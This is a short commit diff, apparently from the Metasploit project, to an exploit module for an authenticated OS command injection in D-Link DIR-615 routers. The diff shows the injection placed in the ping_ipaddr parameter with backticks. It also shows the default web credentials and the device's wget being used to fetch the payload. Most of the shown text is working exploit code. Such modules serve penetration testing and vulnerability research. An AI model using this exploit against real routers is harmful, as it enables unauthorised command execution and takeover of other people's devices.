feeback included

Author: m-1-k-3

modules/exploits/linux/http/dlink_dir615_up_exec.rb

@@ -22,7 +22,8 @@ def initialize(info = {})
 					Some D-Link Routers are vulnerable to an authenticated OS command injection.
 				Default credentials for the web interface are admin/admin or admin/password. Since
 				it is a blind os command injection vulnerability, there is no output for the
-				executed command when using the cmd generic payload. A ping command against a
+				executed command when using the cmd generic payload. This module was tested against
+				a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a
 				controlled system could be used for testing purposes. The exploit uses the wget
 				client from the device to download the payload.
 			},
@@ -77,17 +78,15 @@ def initialize(info = {})
 
 	def request(cmd,user,pass)
 		#http://IP/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=
-		cmd = Rex::Text.uri_encode(cmd)
 
 		begin
 			res = send_request_cgi({
 				'uri'    => @uri,
 				'method' => 'GET',
-				'encode_params' => false,
 				'vars_get' => {
 					"page" => "tools_vct",
 					"hping" => "0",
-					"ping_ipaddr" => "1.1.1.1%60#{cmd}%60",
+					"ping_ipaddr" => "1.1.1.1`#{cmd}`",
 					"ping6_ipaddr" => ""
 				}
 			})